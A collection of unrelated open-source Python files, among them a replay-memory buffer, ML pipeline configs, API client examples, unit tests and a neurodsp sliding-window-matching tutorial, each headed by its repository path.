self.seen_size = 0 # total experiences seen cumulatively
self.head = -1 # index of most recent experience
# generic next_state buffer to store last next_states (allow for multiple for venv)
self.ns_idx_offset = self.body.env.num_envs if body.env.is_venv else 1
self.ns_buffer = deque(maxlen=self.ns_idx_offset)
# declare what data keys to store
self.data_keys = ['states', 'actions', 'rewards', 'next_states', 'dones']
self.reset()
def reset(self):
'''Initializes the memory arrays, size and head pointer'''
# set self.states, self.actions, ...
for k in self.data_keys:
if k != 'next_states': # reuse self.states
# list add/sample is over 10x faster than np, also simpler to handle
setattr(self, k, [None] * self.max_size)
self.size = 0
self.head = -1
self.ns_buffer.clear()
@lab_api
def update(self, state, action, reward, next_state, done):
'''Interface method to update memory'''
if self.body.env.is_venv:
for sarsd in zip(state, action, reward, next_state, done):
self.add_experience(*sarsd)
else:
self.add_experience(state, action, reward, next_state, done)
def add_experience(self, state, action, reward, next_state, done):
'''Implementation for update() to add experience to memory, expanding the memory size if necessary'''
# Move head pointer. Wrap around if necessary
self.head = (self.head + 1) % self.max_size
self.states[self.head] = state.astype(np.float16)
self.actions[self.head] = action
self.rewards[self.head] = reward
self.ns_buffer.append(next_state.astype(np.float16))
self.dones[self.head] = done
# Actually occupied size of memory
if self.size < self.max_size:
self.size += 1
self.seen_size += 1
# set to_train using memory counters head, seen_size instead of tick since clock will step by num_envs when on venv; to_train will be set to 0 after training step
algorithm = self.body.agent.algorithm
algorithm.to_train = algorithm.to_train or (self.seen_size > algorithm.training_start_step and self.head % algorithm.training_frequency == 0)
@lab_api
def sample(self):
'''
Returns a batch of batch_size samples. Batch is stored as a dict.
Keys are the names of the different elements of an experience. Values are an array of the corresponding sampled elements
e.g.
batch = {
'states' : states,
'actions' : actions,
'rewards' : rewards,
'next_states': next_states,
'dones' : dones}
'''
self.batch_idxs = self.sample_idxs(self.batch_size)
batch = {}
for k in self.data_keys:
if k == 'next_states':
batch[k] = sample_next_states(self.head, self.max_size, self.ns_idx_offset, self.batch_idxs, self.states, self.ns_buffer)
else:
batch[k] = util.batch_get(getattr(self, k), self.batch_idxs)
return batch
def sample_idxs(self, batch_size):
        '''Batch indices are sampled uniformly at random'''
batch_idxs = np.random.randint(self.size, size=batch_size)
if self.use_cer: # add the latest sample
batch_idxs[-1] = self.head
return batch_idxs
|
06_reproducibility/workflow_pipeline/my_pipeline/pipeline/configs.py | fanchi/ml-design-patterns | 1,149 | 18389 | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NOTE: this is adapted from the official TFX taxi pipeline sample
# You can find it here: https://github.com/tensorflow/tfx/tree/master/tfx/examples/chicago_taxi_pipeline
import os # pylint: disable=unused-import
# Pipeline name will be used to identify this pipeline
PIPELINE_NAME = 'my_pipeline'
# TODO: replace with your Google Cloud project
GOOGLE_CLOUD_PROJECT='your-cloud-project'
# TODO: replace with the GCS bucket where you'd like to store model artifacts
# Only include the bucket name here, without the 'gs://'
GCS_BUCKET_NAME = 'your-gcs-bucket'
# TODO: set your Google Cloud region below (or use us-central1)
GOOGLE_CLOUD_REGION = 'us-central1'
RUN_FN = 'pipeline.model.run_fn'
TRAIN_NUM_STEPS = 100
EVAL_NUM_STEPS = 100
BIG_QUERY_WITH_DIRECT_RUNNER_BEAM_PIPELINE_ARGS = [
'--project=' + GOOGLE_CLOUD_PROJECT,
'--temp_location=' + os.path.join('gs://', GCS_BUCKET_NAME, 'tmp'),
]
# The rate at which to sample rows from the Chicago Taxi dataset using BigQuery.
# The full taxi dataset is > 120M record. In the interest of resource
# savings and time, we've set the default for this example to be much smaller.
# Feel free to crank it up and process the full dataset!
_query_sample_rate = 0.0001 # Generate a 0.01% random sample.
# The query that extracts the examples from BigQuery. This sample uses
# a BigQuery public dataset from NOAA
BIG_QUERY_QUERY = """
SELECT
usa_wind,
usa_sshs
FROM
`bigquery-public-data.noaa_hurricanes.hurricanes`
WHERE
latitude > 19.5
AND latitude < 64.85
AND longitude > -161.755
AND longitude < -68.01
AND usa_wind IS NOT NULL
AND longitude IS NOT NULL
AND latitude IS NOT NULL
AND usa_sshs IS NOT NULL
AND usa_sshs > 0
"""
# A dict which contains the training job parameters to be passed to Google
# Cloud AI Platform. For the full set of parameters supported by Google Cloud AI
# Platform, refer to
# https://cloud.google.com/ml-engine/reference/rest/v1/projects.jobs#Job
GCP_AI_PLATFORM_TRAINING_ARGS = {
'project': GOOGLE_CLOUD_PROJECT,
'region': 'us-central1',
# Starting from TFX 0.14, training on AI Platform uses custom containers:
# https://cloud.google.com/ml-engine/docs/containers-overview
# You can specify a custom container here. If not specified, TFX will use
# a public container image matching the installed version of TFX.
# Set your container name below.
'masterConfig': {
'imageUri': 'gcr.io/' + GOOGLE_CLOUD_PROJECT + '/tfx-pipeline'
},
# Note that if you do specify a custom container, ensure the entrypoint
# calls into TFX's run_executor script (tfx/scripts/run_executor.py)
}
# A dict which contains the serving job parameters to be passed to Google
# Cloud AI Platform. For the full set of parameters supported by Google Cloud AI
# Platform, refer to
# https://cloud.google.com/ml-engine/reference/rest/v1/projects.models
GCP_AI_PLATFORM_SERVING_ARGS = {
'model_name': PIPELINE_NAME,
'project_id': GOOGLE_CLOUD_PROJECT,
# The region to use when serving the model. See available regions here:
# https://cloud.google.com/ml-engine/docs/regions
'regions': [GOOGLE_CLOUD_REGION],
}
|
lib/python3.6/site-packages/example/authorize_driver.py | venkyyPoojari/Smart-Mirror | 187 | 18452 | # Copyright (c) 2017 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Initializes an UberRidesClient with OAuth 2.0 Credentials.
This example demonstrates how to get an access token through the
OAuth 2.0 Authorization Code Grant and use credentials to create
an UberRidesClient.
To run this example:
(1) Set your app credentials in config.driver.yaml
(2) Run `python authorize_driver.py`
(3) A success message will print, 'Hello {YOUR_NAME}'
(4) User OAuth 2.0 credentials are recorded in
'oauth_driver_session_store.yaml'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import input
from yaml import safe_dump
from example import utils # NOQA
from example.utils import fail_print
from example.utils import response_print
from example.utils import success_print
from example.utils import import_app_credentials
from uber_rides.auth import AuthorizationCodeGrant
from uber_rides.client import UberRidesClient
from uber_rides.errors import ClientError
from uber_rides.errors import ServerError
from uber_rides.errors import UberIllegalState
def authorization_code_grant_flow(credentials, storage_filename):
"""Get an access token through Authorization Code Grant.
Parameters
credentials (dict)
All your app credentials and information
imported from the configuration file.
storage_filename (str)
Filename to store OAuth 2.0 Credentials.
Returns
(UberRidesClient)
An UberRidesClient with OAuth 2.0 Credentials.
"""
auth_flow = AuthorizationCodeGrant(
credentials.get('client_id'),
credentials.get('scopes'),
credentials.get('client_secret'),
credentials.get('redirect_url'),
)
auth_url = auth_flow.get_authorization_url()
login_message = 'Login as a driver and grant access by going to:\n\n{}\n'
login_message = login_message.format(auth_url)
response_print(login_message)
redirect_url = 'Copy the URL you are redirected to and paste here:\n\n'
result = input(redirect_url).strip()
try:
session = auth_flow.get_session(result)
except (ClientError, UberIllegalState) as error:
fail_print(error)
return
credential = session.oauth2credential
credential_data = {
'client_id': credential.client_id,
'redirect_url': credential.redirect_url,
'access_token': credential.access_token,
'expires_in_seconds': credential.expires_in_seconds,
'scopes': list(credential.scopes),
'grant_type': credential.grant_type,
'client_secret': credential.client_secret,
'refresh_token': credential.refresh_token,
}
with open(storage_filename, 'w') as yaml_file:
yaml_file.write(safe_dump(credential_data, default_flow_style=False))
return UberRidesClient(session, sandbox_mode=True)
def hello_user(api_client):
"""Use an authorized client to fetch and print profile information.
Parameters
api_client (UberRidesClient)
An UberRidesClient with OAuth 2.0 credentials.
"""
try:
response = api_client.get_driver_profile()
except (ClientError, ServerError) as error:
fail_print(error)
return
else:
profile = response.json
first_name = profile.get('first_name')
last_name = profile.get('last_name')
email = profile.get('email')
message = 'Hello, {} {}. Successfully granted access token to {}.'
message = message.format(first_name, last_name, email)
success_print(message)
success_print(profile)
success_print('---')
response = api_client.get_driver_trips()
trips = response.json
success_print(trips)
success_print('---')
response = api_client.get_driver_payments()
payments = response.json
success_print(payments)
if __name__ == '__main__':
"""Run the example.
Get an access token through the OAuth 2.0 Authorization Code Grant
and use credentials to create an UberRidesClient.
"""
credentials = import_app_credentials('config.driver.yaml')
api_client = authorization_code_grant_flow(
credentials,
'oauth_driver_session_store.yaml',
)
hello_user(api_client)
|
topic-db/topicdb/core/models/language.py | anthcp-infocom/Contextualise | 184 | 18523 | <gh_stars>100-1000
"""
Language enumeration. Part of the StoryTechnologies project.
June 12, 2016
<NAME> (<EMAIL>)
"""
from enum import Enum
class Language(Enum):
# https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes
# https://en.wikipedia.org/wiki/ISO_639-2
ENG = 1 # English
SPA = 2 # Spanish
DEU = 3 # German
ITA = 4 # Italian
FRA = 5 # French
NLD = 6 # Dutch
def __str__(self):
return self.name
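# Illustrative usage (not part of the original module):
# >>> str(Language.ENG)
# 'ENG'
# >>> Language(3)
# <Language.DEU: 3>
# >>> Language['NLD'].value
# 6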
|
Configuration/StandardSequences/python/L1Reco_cff.py | ckamtsikis/cmssw | 852 | 18543 | <filename>Configuration/StandardSequences/python/L1Reco_cff.py
import FWCore.ParameterSet.Config as cms
from L1Trigger.Configuration.L1TReco_cff import *
|
examples/create_mac_table_entry.py | open-switch/opx-docs | 122 | 18552 | #Python code block to configure MAC address table entry
import cps_utils
#Register the attribute type
cps_utils.add_attr_type('base-mac/table/mac-address', 'mac')
#Define the MAC address, interface index and VLAN attributes
d = {'mac-address': '00:0a:0b:cc:0d:0e', 'ifindex': 18, 'vlan': '100'}
#Create a CPS object
obj = cps_utils.CPSObject('base-mac/table', data=d)
#Associate the operation to the CPS object
tr_obj = ('create', obj.get())
#Create a transaction object
transaction = cps_utils.CPSTransaction([tr_obj])
#Check for failure
ret = transaction.commit()
if not ret:
raise RuntimeError('Error creating MAC Table Entry')
print 'Successfully created'
|
metadata-ingestion/examples/library/dataset_set_tag.py | cuong-pham/datahub | 1,603 | 18557 | # Imports for urn construction utility methods
import logging
from datahub.emitter.mce_builder import make_dataset_urn, make_tag_urn
from datahub.emitter.mcp import MetadataChangeProposalWrapper
from datahub.emitter.rest_emitter import DatahubRestEmitter
# Imports for metadata model classes
from datahub.metadata.schema_classes import (
ChangeTypeClass,
GlobalTagsClass,
TagAssociationClass,
)
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
dataset_urn = make_dataset_urn(platform="hive", name="realestate_db.sales", env="PROD")
tag_urn = make_tag_urn("purchase")
event: MetadataChangeProposalWrapper = MetadataChangeProposalWrapper(
entityType="dataset",
changeType=ChangeTypeClass.UPSERT,
entityUrn=dataset_urn,
aspectName="globalTags",
aspect=GlobalTagsClass(tags=[TagAssociationClass(tag=tag_urn)]),
)
# Create rest emitter
rest_emitter = DatahubRestEmitter(gms_server="http://localhost:8080")
rest_emitter.emit(event)
log.info(f"Set tags to {tag_urn} for dataset {dataset_urn}")
|
examples/Old Format/matrix_latex.py | waldyrious/galgebra | 151 | 18558 | from __future__ import print_function
from sympy import symbols, Matrix
from galgebra.printer import xpdf, Format
def main():
Format()
a = Matrix ( 2, 2, ( 1, 2, 3, 4 ) )
b = Matrix ( 2, 1, ( 5, 6 ) )
c = a * b
print(a,b,'=',c)
x, y = symbols ( 'x, y' )
d = Matrix ( 1, 2, ( x ** 3, y ** 3 ))
e = Matrix ( 2, 2, ( x ** 2, 2 * x * y, 2 * x * y, y ** 2 ) )
f = d * e
print('%',d,e,'=',f)
# xpdf()
xpdf(pdfprog=None)
return
if __name__ == "__main__":
main()
|
modules/python3/tests/unittests/scripts/glm.py | ImagiaViz/inviwo | 349 | 18572 | import inviwopy
from inviwopy.glm import *
v1 = vec3(1,2,3)
v2 = size2_t(4,5)
m1 = mat4(1)
m2 = mat3(0,1,0,-1,0,0,0,0,2)
v3 = m2 * v1
v4 = vec4(1,2,3,4)
w = v4.w
a = v4.a
q = v4.q
z = v4.z
b = v4.b
p = v4.p
y = v4.y
g = v4.g
t = v4.t
x = v4.x
r = v4.r
s = v4.s
|
tests/advanced_tests/regressors.py | amlanbanerjee/auto_ml | 1,671 | 18593 | <reponame>amlanbanerjee/auto_ml<filename>tests/advanced_tests/regressors.py
import datetime
import os
import random
import sys
sys.path = [os.path.abspath(os.path.dirname(__file__))] + sys.path
from auto_ml import Predictor
from auto_ml.utils_models import load_ml_model
import dill
from nose.tools import assert_equal, assert_not_equal, with_setup
import numpy as np
from sklearn.model_selection import train_test_split
import utils_testing as utils
def optimize_final_model_regression(model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
# We just want to make sure these run, not necessarily make sure that they're super accurate (which takes more time, and is dataset dependent)
df_boston_train = df_boston_train.sample(frac=0.5)
column_descriptions = {
'MEDV': 'output'
, 'CHAS': 'categorical'
}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
ml_predictor.train(df_boston_train, optimize_final_model=True, model_names=model_name)
test_score = ml_predictor.score(df_boston_test, df_boston_test.MEDV)
print('test_score')
print(test_score)
# the random seed gets a score of -3.21 on python 3.5
# There's a ton of noise here, due to small sample sizes
lower_bound = -3.4
if model_name == 'DeepLearningRegressor':
lower_bound = -24
if model_name == 'LGBMRegressor':
lower_bound = -16
if model_name == 'GradientBoostingRegressor':
lower_bound = -5.1
if model_name == 'CatBoostRegressor':
lower_bound = -4.5
if model_name == 'XGBRegressor':
lower_bound = -4.8
assert lower_bound < test_score < -2.75
def getting_single_predictions_regression(model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {
'MEDV': 'output'
, 'CHAS': 'categorical'
}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
ml_predictor.train(df_boston_train, model_names=model_name)
file_name = ml_predictor.save(str(random.random()))
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_boston_test_dictionaries = df_boston_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
print('predictions')
print(predictions)
print('predictions[0]')
print(predictions[0])
print('type(predictions)')
print(type(predictions))
first_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -2.9
if model_name == 'DeepLearningRegressor':
lower_bound = -7.8
if model_name == 'LGBMRegressor':
lower_bound = -4.95
if model_name == 'XGBRegressor':
lower_bound = -3.4
if model_name == 'CatBoostRegressor':
lower_bound = -3.7
assert lower_bound < first_score < -2.7
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_boston_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_boston_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro, this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.1 < duration.total_seconds() / 1.0 < 60
# 3. make sure we're not modifying the dictionaries (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
second_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -2.7
|
software/nuke/init.py | kei-iketani/plex | 153 | 18640 | <filename>software/nuke/init.py
#*********************************************************************
# content = init Nuke
# version = 0.1.0
# date = 2019-12-01
#
# license = MIT <https://github.com/alexanderrichtertd>
# author = <NAME> <<EMAIL>>
#*********************************************************************
import os
import errno
import nuke
import pipefunc
from tank import Tank
#*********************************************************************
# VARIABLE
TITLE = os.path.splitext(os.path.basename(__file__))[0]
LOG = Tank().log.init(script=TITLE)
PROJECT_DATA = Tank().data_project
RESOLUTION = (' ').join([str(PROJECT_DATA['resolution'][0]),
str(PROJECT_DATA['resolution'][1]),
PROJECT_DATA['name'].replace(' ', '')])
#*********************************************************************
# FOLDER CREATION
def create_write_dir():
file_name = nuke.filename(nuke.thisNode())
file_path = os.path.dirname(file_name)
os_path = nuke.callbacks.filenameFilter(file_path)
# cope with the directory existing already by ignoring that exception
try: os.makedirs(os_path)
except OSError, e:
if e.errno != errno.EEXIST:
raise
def add_plugin_paths():
# ADD all IMG paths
for img in os.getenv('IMG_PATH').split(';'):
for img_sub in pipefunc.get_deep_folder_list(path=img, add_path=True):
nuke.pluginAddPath(img_sub)
# ADD sub software paths
for paths in os.getenv('SOFTWARE_SUB_PATH').split(';'):
nuke.pluginAddPath(paths)
#*********************************************************************
# PIPELINE
Tank().init_software()
add_plugin_paths()
try: from scripts import write_node
except: LOG.warning('FAILED loading write_node')
# LOAD paths
try:
for paths in os.getenv('SOFTWARE_SUB_PATH').split(';'):
nuke.pluginAddPath(paths)
except:
LOG.warning('FAILED loading SOFTWARE_SUB_PATH')
print('SETTINGS')
# RESOLUTION *********************************************************************
try:
nuke.addFormat(RESOLUTION)
nuke.knobDefault('Root.format', PROJECT_DATA['name'].replace(' ', ''))
print(' {} ON - {}'.format(chr(254), RESOLUTION))
except:
LOG.error(' OFF - {}'.format(RESOLUTION), exc_info=True)
print(' {} OFF - {}'.format(chr(254), RESOLUTION))
# FPS *********************************************************************
try:
nuke.knobDefault("Root.fps", str(PROJECT_DATA['fps']))
print(' {} ON - {} fps'.format(chr(254), PROJECT_DATA['fps']))
except:
LOG.error(' OFF - {} fps'.format(PROJECT_DATA['fps']), exc_info=True)
print(' {} OFF - {} fps'.format(chr(254), PROJECT_DATA['fps']))
# createFolder *********************************************************************
try:
nuke.addBeforeRender(create_write_dir)
print(' {} ON - create_write_dir (before render)'.format(chr(254)))
except:
LOG.error(' OFF - create_write_dir (before render)'.format(chr(254)), exc_info=True)
print(' {} OFF - create_write_dir (before render)'.format(chr(254)))
print('')
|
glasses/models/classification/base/__init__.py | rentainhe/glasses | 271 | 18643 | from torch import Tensor, nn
from ...base import VisionModule
class ClassificationModule(VisionModule):
"""Base Classification Module class"""
def __init__(
self,
encoder: nn.Module,
head: nn.Module,
in_channels: int = 3,
n_classes: int = 1000,
**kwargs
):
super().__init__()
self.encoder = encoder(in_channels=in_channels, **kwargs)
self.head = head(self.encoder.widths[-1], n_classes)
self.initialize()
def initialize(self):
pass
def forward(self, x: Tensor) -> Tensor:
x = self.encoder(x)
x = self.head(x)
return x
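# A minimal wiring sketch (illustrative; ``MyEncoder`` and ``MyHead`` are hypothetical
# stand-ins, not classes from this package). The encoder callable must accept
# ``in_channels`` and expose a ``widths`` list; the head maps (width, n_classes) to a
# classifier module:
# model = ClassificationModule(encoder=MyEncoder, head=MyHead, in_channels=3, n_classes=10)
# logits = model(torch.randn(1, 3, 224, 224))  # -> shape (1, 10)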
|
comrade/blueprints/rest.py | sp3c73r2038/elasticsearch-comrade | 256 | 18647 | from elasticsearch import TransportError
from sanic import Blueprint
from sanic.request import Request
from sanic.response import HTTPResponse, json
from ..connections import get_client
rest_bp = Blueprint('rest')
def format_es_exception(e: TransportError):
return json({"status_code": e.status_code,
"error": e.error,
"info": e.info})
@rest_bp.route('/query', methods=['POST'])
async def close_index(request: Request) -> HTTPResponse:
client = get_client(request)
body = request.json['body']
method = request.json['method']
path = request.json['path']
try:
resp = await client.transport.perform_request(method, path, body=body)
except TransportError as e:
return format_es_exception(e)
return json(resp)
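# Illustrative request payload for the /query endpoint (values are hypothetical):
#   POST /query
#   {"method": "GET", "path": "/_cat/indices", "body": null}
# The handler forwards method, path and body to Elasticsearch and returns either the
# raw response or a {"status_code", "error", "info"} object on TransportError.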
|
tests/test_utils.py | tedeler/pyexchange | 128 | 18648 | <gh_stars>100-1000
from datetime import datetime
from pytz import timezone, utc
from pytest import mark
from pyexchange.utils import convert_datetime_to_utc
def test_converting_none_returns_none():
assert convert_datetime_to_utc(None) is None
def test_converting_non_tz_aware_date_returns_tz_aware():
utc_time = datetime(year=2014, month=1, day=1, hour=1, minute=1, second=1)
assert utc_time.tzinfo is None
assert convert_datetime_to_utc(utc_time) == datetime(year=2014, month=1, day=1, hour=1, minute=1, second=1, tzinfo=utc)
def test_converting_tz_aware_date_returns_tz_aware_date():
# US/Pacific timezone is UTC-07:00 (In April we are in DST)
# We use localize() because according to the pytz documentation, using the tzinfo
# argument of the standard datetime constructors does not work for timezones with DST.
pacific_time = timezone("US/Pacific").localize(datetime(year=2014, month=4, day=1, hour=1, minute=0, second=0))
utc_time = utc.localize(datetime(year=2014, month=4, day=1, hour=8, minute=0, second=0))
assert convert_datetime_to_utc(pacific_time) == utc_time
|
section_11_(api)/dicts_and_lists.py | hlcooll/python_lessons | 425 | 18716 | <filename>section_11_(api)/dicts_and_lists.py
# Dictionaries and lists, together
# Loading from https://raw.githubusercontent.com/shannonturner/education-compliance-reports/master/investigations.json
investigations = {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [
-112.073032,
33.453527
]
},
"properties": {
"marker-symbol": "marker",
"marker-color": "#D4500F",
"address": " AZ ",
"name": "Arizona State University"
}
},
{
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [
-121.645734,
39.648248
]
},
"properties": {
"marker-symbol": "marker",
"marker-color": "#D4500F",
"address": " CA ",
"name": "Butte-Glen Community College District"
}
},
]
}
# The first level is a dictionary with two keys: type and features
# type's value is a string: FeatureCollection
# features' value is a list of dictionaries
# We're going to focus on the features list.
# Each item in the features list is a dictionary that has three keys: type, geometry, and properties
# If we wanted to access all of the properies for the first map point, here's how:
print investigations['features'][0]['properties']
# list of dictionaries ^ ^ ^
# first map point | | properties
# {
# "marker-symbol": "marker",
# "marker-color": "#D4500F",
# "address": " AZ ",
# "name": "Arizona State University"
# }
# As we see above, properties is itself a dictionary
# To get the name of that map point:
print investigations['features'][0]['properties']['name']
# Arizona State University
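# A further example: to print the name of every map point, loop over the features list
# and pull 'name' out of each feature's properties dictionary:
for feature in investigations['features']:
    print feature['properties']['name']
# Arizona State University
# Butte-Glen Community College District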
# Generally speaking, if what's between the square brackets is a number, you're accessing a list.
# If it's a string, you're accessing a dictionary.
# If you get stuck or are getting errors, try printing out the item and the key or index. |
veinmind-backdoor/register.py | Jqqzzz/veinmind-tools | 364 | 18721 | class register:
plugin_dict = {}
plugin_name = []
@classmethod
def register(cls, plugin_name):
def wrapper(plugin):
cls.plugin_dict[plugin_name] = plugin
return plugin
return wrapper |
tutorials/rhythm/plot_SlidingWindowMatching.py | bcmartinb/neurodsp | 154 | 18740 | """
Sliding Window Matching
=======================
Find recurring patterns in neural signals using Sliding Window Matching.
This tutorial primarily covers the :func:`~.sliding_window_matching` function.
"""
###################################################################################################
# Overview
# --------
#
# Non-periodic or non-sinusoidal properties can be difficult to assess in frequency domain
# methods. To try and address this, the sliding window matching (SWM) algorithm has been
# proposed for detecting and measuring recurring, but unknown, patterns in time series data.
# Patterns of interest may be transient events, and/or the waveform shape of neural oscillations.
#
# In this example, we will explore applying the SWM algorithm to some LFP data.
#
# The SWM approach tries to find recurring patterns (or motifs) in the data, using sliding
# windows. An iterative process samples window randomly, and compares each to the average
# window. The goal is to find a selection of windows that look maximally like the average
# window, at which point the occurrences of the window have been detected, and the average
# window pattern can be examined.
#
# The sliding window matching algorithm is described in
# `Gips et al, 2017 <https://doi.org/10.1016/j.jneumeth.2016.11.001>`_
#
###################################################################################################
# sphinx_gallery_thumbnail_number = 2
import numpy as np
# Import the sliding window matching function
from neurodsp.rhythm import sliding_window_matching
# Import utilities for loading and plotting data
from neurodsp.utils.download import load_ndsp_data
from neurodsp.plts.rhythm import plot_swm_pattern
from neurodsp.plts.time_series import plot_time_series
from neurodsp.utils import set_random_seed, create_times
from neurodsp.utils.norm import normalize_sig
###################################################################################################
# Set random seed, for reproducibility
set_random_seed(0)
###################################################################################################
# Load neural signal
# ------------------
#
# First, we will load a segment of ECoG data, as an example time series.
#
###################################################################################################
# Download, if needed, and load example data files
sig = load_ndsp_data('sample_data_1.npy', folder='data')
sig = normalize_sig(sig, mean=0, variance=1)
# Set sampling rate, and create a times vector for plotting
fs = 1000
times = create_times(len(sig)/fs, fs)
###################################################################################################
#
# Next, we can visualize this data segment. As we can see this segment of data has
# some prominent bursts of oscillations, in this case, in the beta frequency.
#
###################################################################################################
# Plot example signal
plot_time_series(times, sig)
###################################################################################################
# Apply sliding window matching
# -----------------------------
#
# The beta oscillation in our data segment looks like it might have some non-sinusoidal
# properties. We can investigate this with sliding window matching.
#
# Sliding window matching can be applied with the
# :func:`~.sliding_window_matching` function.
#
###################################################################################################
# Data Preprocessing
# ~~~~~~~~~~~~~~~~~~
#
# Typically, the input signal does not have to be filtered into a band of interest to use SWM.
#
# If the goal is to characterize non-sinusoidal rhythms, you typically won't want to
# apply a filter that will smooth out the features of interest.
#
# However, if the goal is to characterize higher frequency activity, it can be useful to
# apply a highpass filter, so that the method does not converge on a lower frequency motif.
#
# In our case, the beta rhythm of interest is the most prominent, low frequency, feature of the
# data, so we won't apply a filter.
#
###################################################################################################
# Algorithm Settings
# ~~~~~~~~~~~~~~~~~~
#
# The SWM algorithm has some algorithm specific settings that need to be applied, including:
#
# - `win_len` : the length of the window, defined in seconds
# - `win_spacing` : the minimum distance between windows, also defined in seconds
#
# The length of the window influences the patterns that are extracted from the data.
# Typically, you want to set the window length to match the expected timescale of the
# patterns under study.
#
# For our purposes, we will define the window length to be about 1 cycle of a beta oscillation,
# which should help the algorithm to find the waveform shape of the neural oscillation.
#
###################################################################################################
# Define window length & minimum window spacing, both in seconds
win_len = .055
win_spacing = .055
###################################################################################################
# Apply the sliding window matching algorithm to the time series
windows, window_starts = sliding_window_matching(sig, fs, win_len, win_spacing, var_thresh=.5)
###################################################################################################
# Examine the Results
# ~~~~~~~~~~~~~~~~~~~
#
# What we got back from the SWM function are the windows extracted from the data, and
# the list of indices in the data at which each window starts. From the extracted
# windows, we can compute the average window pattern.
#
# In order to visualize the resulting pattern, we can use
# :func:`~.plot_swm_pattern`.
#
###################################################################################################
# Compute the average window
avg_window = np.mean(windows, 0)
# Plot the discovered pattern
plot_swm_pattern(avg_window)
###################################################################################################
#
# In the average pattern above, which appears to capture a beta rhythm, we can see
# some of the waveform shape of the extracted rhythm.
#
###################################################################################################
# Concluding Notes
# ~~~~~~~~~~~~~~~~
#
# One thing to keep in mind is that the SWM algorithm includes a random element of sampling
# and comparing the windows - meaning it is not deterministic. Because of this, results
# can change with different random seeds.
#
# To explore this, go back and change the random seed, and see how the output changes.
#
# You can also set the number of iterations that the algorithm sweeps through. Increasing
# the number of iterations, and using longer data segments, can help improve the robustness
# of the algorithm results.
#
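#
# As a rough illustration, re-running the algorithm with a different seed and a larger iteration
# budget might look like the sketch below. This is a hypothetical snippet: it assumes the
# randomness is driven by numpy's global seed and that this version of
# :func:`~.sliding_window_matching` accepts a ``max_iterations`` keyword::
#
#     import numpy as np
#
#     # Re-run SWM with a different random seed and more iterations
#     np.random.seed(1)
#     windows, window_starts = sliding_window_matching(sig, fs, win_len, win_spacing,
#                                                      max_iterations=500, var_thresh=.5)
#
#     # Re-plot the average pattern to compare against the earlier result
#     plot_swm_pattern(np.mean(windows, 0))
#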
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/tests/test_ir.py | BadDevCode/lumberyard | 1,738 | 18778 | <reponame>BadDevCode/lumberyard
from __future__ import print_function
import numba.unittest_support as unittest
from numba import compiler, ir, objmode
import numpy as np
class TestIR(unittest.TestCase):
def test_IRScope(self):
filename = "<?>"
top = ir.Scope(parent=None, loc=ir.Loc(filename=filename, line=1))
local = ir.Scope(parent=top, loc=ir.Loc(filename=filename, line=2))
apple = local.define('apple', loc=ir.Loc(filename=filename, line=3))
self.assertIs(local.get('apple'), apple)
self.assertEqual(len(local.localvars), 1)
orange = top.define('orange', loc=ir.Loc(filename=filename, line=4))
self.assertEqual(len(local.localvars), 1)
self.assertEqual(len(top.localvars), 1)
self.assertIs(top.get('orange'), orange)
self.assertIs(local.get('orange'), orange)
